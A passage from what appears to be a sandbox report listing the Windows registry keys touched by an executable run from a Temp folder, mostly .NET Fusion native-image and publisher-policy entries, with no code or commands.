NT\CurrentVersion\Image File Execution Options\DevOverrideEnable HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000 HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\GACChangeNotification\Default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86 HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6418cf\6185f1ae HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Deployment__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.Accessibility__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.8.0.Microsoft.VisualBasic__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.VisualBasic,8.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Web__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Management__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Remoting__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Remoting,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it-IT_b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\40dcb014 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|i1.exe HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|i1.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|i1.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\Global HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it_b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\1ffc8ca7 